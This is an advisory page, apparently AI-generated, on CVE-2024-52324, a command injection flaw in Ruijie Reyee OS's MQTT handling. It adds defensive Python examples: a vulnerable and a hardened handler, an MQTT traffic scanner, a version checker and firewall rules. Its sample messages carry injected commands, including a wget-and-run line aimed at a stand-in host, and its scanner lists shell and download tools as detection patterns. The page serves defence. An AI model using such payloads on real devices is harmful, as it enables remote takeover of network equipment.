CVE-2024-52324: Ruijie Reyee OS RCE Vulnerability

CVE-2024-52324 is a remote code execution vulnerability in Ruijie Reyee OS that allows attackers to execute arbitrary OS commands via malicious MQTT messages. This article covers technical details, affected versions, and mitigations.

CVE-2024-52324 Overview

CVE-2024-52324 is a critical command injection vulnerability affecting Ruijie Reyee OS, a cloud-managed networking platform used in enterprise and industrial environments. The vulnerability exists due to the use of an inherently dangerous function that processes MQTT messages without proper validation, allowing remote attackers to execute arbitrary operating system commands on affected devices.

This vulnerability poses a significant risk to organizations relying on Ruijie Reyee networking equipment, as successful exploitation could lead to complete device compromise, network pivoting, and potential lateral movement within affected infrastructure.

Critical Impact

Remote attackers can send malicious MQTT messages to execute arbitrary OS commands on vulnerable Ruijie Reyee devices, potentially compromising entire network segments without authentication.

Affected Products

  • Ruijie Reyee OS versions 2.206.x up to, but not including, 2.320.x (2.320.x is the first fixed release line)
  • Ruijie Reyee cloud-managed networking devices running affected firmware
  • Enterprise and ICS/SCADA environments utilizing Reyee OS-based equipment

Discovery Timeline

  • 2024-12-06 - CVE-2024-52324 published to NVD
  • 2024-12-10 - Last updated in NVD database

Technical Details for CVE-2024-52324

Vulnerability Analysis

The vulnerability stems from CWE-242: Use of Inherently Dangerous Function. Ruijie Reyee OS implements MQTT (Message Queuing Telemetry Transport) functionality for device management and communication. The affected versions use a dangerous function to process incoming MQTT messages, which directly passes user-controlled input to system command execution without adequate sanitization.

MQTT is commonly used in IoT and industrial control system environments for lightweight messaging between devices and management platforms. When an attacker gains access to the MQTT broker or can inject messages into the communication channel, they can craft malicious payloads that exploit this dangerous function to achieve arbitrary command execution.

The network-accessible nature of this vulnerability means that any attacker with network access to the MQTT service can potentially exploit it without authentication, making it particularly dangerous in environments where network segmentation is insufficient.

Root Cause

The root cause is the implementation of an inherently dangerous function (CWE-242) within the MQTT message processing logic. Rather than using safe alternatives that properly sanitize or escape user input, the application directly incorporates message content into OS command execution contexts. This design flaw bypasses typical input validation controls and allows attackers to inject arbitrary commands through carefully crafted MQTT payloads.
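The pattern described above, shown as an added illustration rather than as Reyee OS code (Ruijie's actual handler, message format and command set are not public on this page): a hypothetical MQTT command handler that concatenates message content into a single string destined for a shell, beside a hardened version that maps an allowlisted action to a fixed argv, validates the one operand, and never invokes a shell. The JSON message shape and the `ping`/`traceroute` actions are assumptions made for the example.

```python
"""Illustration of the CWE-242 pattern discussed above: an MQTT command
handler that splices message content into an OS command string, beside a
hardened handler. Constructed example code, not Reyee OS code; the JSON
message shape and the 'ping'/'traceroute' actions are assumptions."""
import ipaddress
import json
import re
import subprocess

# Constructed sample messages, not captured traffic.
BENIGN_MSG = b'{"action": "ping", "target": "10.0.0.1"}'
MALICIOUS_MSG = (b'{"action": "ping", "target": '
                 b'"10.0.0.1; wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x"}')


def build_command_unsafe(message: bytes) -> str:
    """Vulnerable pattern: message content is concatenated into one string
    destined for a shell (the equivalent of system()/popen()). The string is
    returned rather than executed so this demonstration is safe to run."""
    msg = json.loads(message)
    return f"ping -c 1 {msg['target']}"


# Allowlist of actions mapped to fixed argv prefixes; nothing else is reachable.
ALLOWED_ACTIONS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "5"],
}

# RFC 1123 style hostname: labels of letters, digits and hyphens with no
# leading hyphen, so the operand can never be parsed as an option by the tool.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def _validate_target(target: str) -> str:
    """Accept an IPv4/IPv6 literal or a hostname; reject anything else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def build_command_safe(message: bytes) -> list:
    """Hardened handler: fixed argv from the allowlist plus one validated
    operand. No shell is involved, so metacharacters carry no meaning."""
    msg = json.loads(message)
    action = msg.get("action")
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"rejected action: {action!r}")
    target = _validate_target(str(msg.get("target", "")))
    return [*ALLOWED_ACTIONS[action], target]


def is_rejected(message: bytes) -> bool:
    """True when the hardened handler refuses the message."""
    try:
        build_command_safe(message)
    except ValueError:
        return True
    return False


def run_safe(message: bytes, timeout: float = 5.0) -> int:
    """Execute a validated command; shell=False (the default) hands argv
    straight to execve(), with no shell in between."""
    argv = build_command_safe(message)
    return subprocess.run(argv, check=False, timeout=timeout,
                          capture_output=True).returncode


if __name__ == "__main__":
    # The unsafe builder emits one string in which a shell would honour ';'.
    print("unsafe:", build_command_unsafe(MALICIOUS_MSG))
    print("safe  :", build_command_safe(BENIGN_MSG))
    print("safe  : rejected malicious message:", is_rejected(MALICIOUS_MSG))
```

The point of the hardened version is not better escaping: it removes the shell from the path entirely and constrains the operand to a type (address or hostname) in which `;`, `$(` and a leading `-` cannot appear, so option injection into the tool is closed off as well as command injection.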

Attack Vector

The attack vector is network-based, requiring the attacker to send specially crafted MQTT messages to vulnerable Ruijie Reyee devices. The exploitation flow typically involves:

  1. Identifying devices running vulnerable Reyee OS versions (2.206.x up to, but not including, 2.320.x)
  2. Gaining access to the MQTT communication channel (either through the broker or network access)
  3. Crafting malicious MQTT messages containing embedded OS commands
  4. Sending the payload to trigger command execution on target devices

The vulnerability does not require user interaction or authentication, making it exploitable through automated attacks. Once command execution is achieved, attackers can establish persistent access, exfiltrate configuration data, or pivot to other network segments.

For technical details on the vulnerability mechanism and recommended mitigations, refer to the CISA ICS Advisory ICSA-24-338-01.

Detection Methods for CVE-2024-52324

Indicators of Compromise

  • Unusual MQTT traffic patterns or malformed MQTT messages targeting Ruijie Reyee devices
  • Unexpected outbound network connections from networking equipment
  • Anomalous process execution or shell activity on Reyee OS devices
  • Log entries indicating command execution failures or unusual system calls

Detection Strategies

  • Monitor MQTT traffic (by default TCP 1883 for plaintext MQTT and TCP 8883 for MQTT over TLS) for unusual message patterns or payloads containing shell metacharacters; on 8883 the payload is encrypted on the wire, so inspection there requires TLS termination at an inspection point or broker-side logging
  • Implement network intrusion detection rules to identify MQTT messages with potential command injection patterns
  • Deploy behavioral analysis on network devices to detect unexpected process spawning or system command execution
  • Review device logs for authentication failures or unexpected administrative actions
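One way to implement the traffic-side check above, as an added example that is not from the original page, the vendor or the CISA advisory: a small MQTT 3.1.1 PUBLISH parser that runs over packets captured on TCP/1883 and flags payloads carrying shell metacharacters or common tool and interpreter names. It also reports malformed PUBLISH packets, since a hand-built or fuzzed packet is an indicator in itself. The topic names and payloads in `SAMPLES` are constructed, not captured Reyee traffic, and the topic layout is an assumption.

```python
"""Added detection example: parse MQTT 3.1.1 PUBLISH packets seen on
TCP/1883 and flag payloads that carry shell metacharacters or tool names.
Not from the original page, the vendor or the CISA advisory; the topic
names and payloads in SAMPLES are constructed, not captured Reyee traffic."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

PUBLISH = 3  # MQTT control packet type, carried in the high nibble of byte 0

@dataclass
class Publish:
    topic: str
    qos: int
    payload: bytes

def _remaining_length(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode the MQTT variable-length integer (1 to 4 bytes) starting at pos."""
    value, multiplier = 0, 1
    for _ in range(4):
        if pos >= len(buf):
            raise ValueError("truncated remaining length")
        byte = buf[pos]
        pos += 1
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, pos
        multiplier *= 128
    raise ValueError("malformed remaining length")

def parse_publish(packet: bytes) -> Optional[Publish]:
    """Return the PUBLISH fields, or None for any other control packet type."""
    if not packet:
        raise ValueError("empty packet")
    ptype, flags = packet[0] >> 4, packet[0] & 0x0F
    if ptype != PUBLISH:
        return None
    qos = (flags >> 1) & 0x03
    if qos == 3:
        raise ValueError("invalid QoS")
    length, pos = _remaining_length(packet, 1)
    end = pos + length
    if end > len(packet):
        raise ValueError("truncated packet")
    tlen = int.from_bytes(packet[pos:pos + 2], "big")
    pos += 2
    topic = packet[pos:pos + tlen].decode("utf-8")
    pos += tlen
    if qos > 0:
        pos += 2  # packet identifier is present only for QoS 1 and 2
    return Publish(topic, qos, packet[pos:end])

def encode_publish(topic: str, payload: bytes, qos: int = 0,
                   packet_id: int = 1) -> bytes:
    """Build a PUBLISH packet; used here only to construct sample traffic."""
    t = topic.encode("utf-8")
    body = len(t).to_bytes(2, "big") + t
    if qos:
        body += packet_id.to_bytes(2, "big")
    body += payload
    rl, n = b"", len(body)
    while True:  # variable-length encoding, 7 bits per byte, MSB = continuation
        digit, n = n % 128, n // 128
        rl += bytes([digit | 0x80 if n else digit])
        if not n:
            break
    return bytes([(PUBLISH << 4) | (qos << 1)]) + rl + body

# Characters a POSIX shell treats specially, plus common tool/interpreter
# names. Tune to the topic namespace: '&' and '$' also occur in harmless URLs.
SHELL_META = re.compile(rb"[;|&`$<>\n]")
TOOL_NAMES = re.compile(rb"/bin/sh|/bin/bash|busybox|telnetd|wget |curl |nc ")

def suspicious(pub: Publish) -> List[str]:
    """Reasons this PUBLISH looks like a command-injection attempt."""
    reasons = []
    if SHELL_META.search(pub.payload):
        reasons.append("shell metacharacters in payload")
    if TOOL_NAMES.search(pub.payload):
        reasons.append("tool or interpreter name in payload")
    return reasons

def scan(packets) -> List[Tuple[int, str, List[str]]]:
    """Return (index, topic, reasons) for every packet worth an alert,
    including PUBLISH packets that fail to parse."""
    findings = []
    for i, pkt in enumerate(packets):
        try:
            pub = parse_publish(pkt)
        except ValueError as exc:
            findings.append((i, "<unparsed>", [f"malformed packet: {exc}"]))
            continue
        if pub is None:
            continue
        reasons = suspicious(pub)
        if reasons:
            findings.append((i, pub.topic, reasons))
    return findings

SAMPLES = [  # constructed sample traffic
    encode_publish("devices/ab12/telemetry", b'{"cpu": 12, "uptime": 86400}'),
    encode_publish("devices/ab12/cmd",
                   b'{"action":"ping","target":"10.0.0.1; wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x"}',
                   qos=1),
    encode_publish("devices/ab12/cmd", b'{"action":"ping","target":"$(id)"}'),
    bytes([0x20, 0x02, 0x00, 0x00]),  # CONNACK: not a PUBLISH, ignored
    b"\x30\xff",                       # PUBLISH header with a truncated length
]

if __name__ == "__main__":
    for index, topic, reasons in scan(SAMPLES):
        print(f"packet {index} topic={topic}: {'; '.join(reasons)}")
```

Feed it MQTT application-layer payloads reassembled from a capture (one packet per element); it only sees cleartext, so for port 8883 it has to run behind a TLS-terminating inspection point or on broker logs, as noted above. Expect false positives on topics whose payloads legitimately carry URLs or query strings, and narrow the metacharacter class per topic rather than globally.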

Monitoring Recommendations

  • Establish baseline MQTT communication patterns and alert on deviations
  • Configure SIEM rules to correlate multiple indicators such as unusual MQTT traffic followed by outbound connections
  • Monitor firmware versions across all Ruijie Reyee devices to identify unpatched systems
  • Implement network segmentation monitoring to detect potential lateral movement from compromised devices
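For the firmware-version check in the list above, an added example (not from the page or from Ruijie) that applies the affected range stated under Affected Products, 2.206.x up to but not including 2.320.x, to a device inventory. The boundary cases are the ones worth getting right: 2.206.0 and 2.319.x are affected, 2.320.0 is not, and a device whose version cannot be parsed must be surfaced rather than silently counted as safe. The device names and version strings in `INVENTORY` are constructed.

```python
"""Added example for the firmware-inventory check above (not from the page
or from Ruijie): decide whether a Reyee OS version string falls in the
affected range, 2.206.x up to but not including 2.320.x, and triage a
device list. The device names and versions in INVENTORY are constructed."""
import re
from typing import List, Tuple

AFFECTED_FROM = (2, 206)  # inclusive
FIXED_AT = (2, 320)       # exclusive: 2.320.0 and later are fixed

# major.minor with an optional patch component, anywhere in the string
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Tuple[int, int]:
    """Return (major, minor); the patch component does not affect the verdict."""
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    return int(match.group(1)), int(match.group(2))


def is_affected(version: str) -> bool:
    """True when major.minor lies in [2.206, 2.320)."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_AT


INVENTORY = [  # constructed sample data
    ("sw-floor1", "2.206.0"),        # first affected release line
    ("ap-lobby", "2.319.12"),        # last affected release line
    ("gw-edge", "2.320.0"),          # first fixed release line
    ("ap-warehouse", "2.205.8"),     # before the affected range
    ("sw-lab", "ReyeeOS 2.300.1"),   # vendor prefix, still parses
    ("ap-guest", "n/a"),             # no version reported
]


def triage(inventory) -> Tuple[List[str], List[str], List[str]]:
    """Split an inventory into (affected, not affected, unknown) device names.
    Unparseable versions go to 'unknown' so they get investigated instead of
    being treated as patched."""
    affected, clean, unknown = [], [], []
    for name, version in inventory:
        try:
            (affected if is_affected(version) else clean).append(name)
        except ValueError:
            unknown.append(name)
    return affected, clean, unknown


if __name__ == "__main__":
    affected, clean, unknown = triage(INVENTORY)
    print("affected :", affected)
    print("clean    :", clean)
    print("unknown  :", unknown)
```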

How to Mitigate CVE-2024-52324

Immediate Actions Required

  • Upgrade all Ruijie Reyee OS devices to version 2.320.x or later immediately
  • Isolate vulnerable devices on separate network segments until patching is complete
  • Implement strict firewall rules to limit MQTT access to trusted management systems only
  • Audit network access controls to prevent unauthorized MQTT communication with Reyee devices

Patch Information

Ruijie Networks has addressed this vulnerability in Reyee OS version 2.320.x. Organizations should update all affected devices to this version or later to remediate the vulnerability. Refer to the CISA ICS Advisory ICSA-24-338-01 for detailed patching guidance and additional vendor information.

Workarounds

  • Restrict network access to MQTT services using firewall rules and network segmentation
  • Implement MQTT broker authentication and access controls to limit message sources
  • Deploy network monitoring to detect and block suspicious MQTT traffic patterns
  • Consider disabling cloud management features temporarily if direct MQTT exposure cannot be mitigated
```bash
# Example firewall rules to restrict MQTT access (adjust for your environment).
# Apply on the host or gateway that fronts the MQTT service. MQTT is allowed
# only from the trusted management network 10.0.0.0/24; everything else is
# dropped. Order matters: the ACCEPT rules must be evaluated before the DROPs,
# and with -A they are appended, so they must also precede any broad ACCEPT
# rule already present in the INPUT chain (use -I to insert at the top if so).
iptables -A INPUT -p tcp --dport 1883 -s 10.0.0.0/24 -j ACCEPT   # plaintext MQTT
iptables -A INPUT -p tcp --dport 1883 -j DROP
iptables -A INPUT -p tcp --dport 8883 -s 10.0.0.0/24 -j ACCEPT   # MQTT over TLS
iptables -A INPUT -p tcp --dport 8883 -j DROP
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
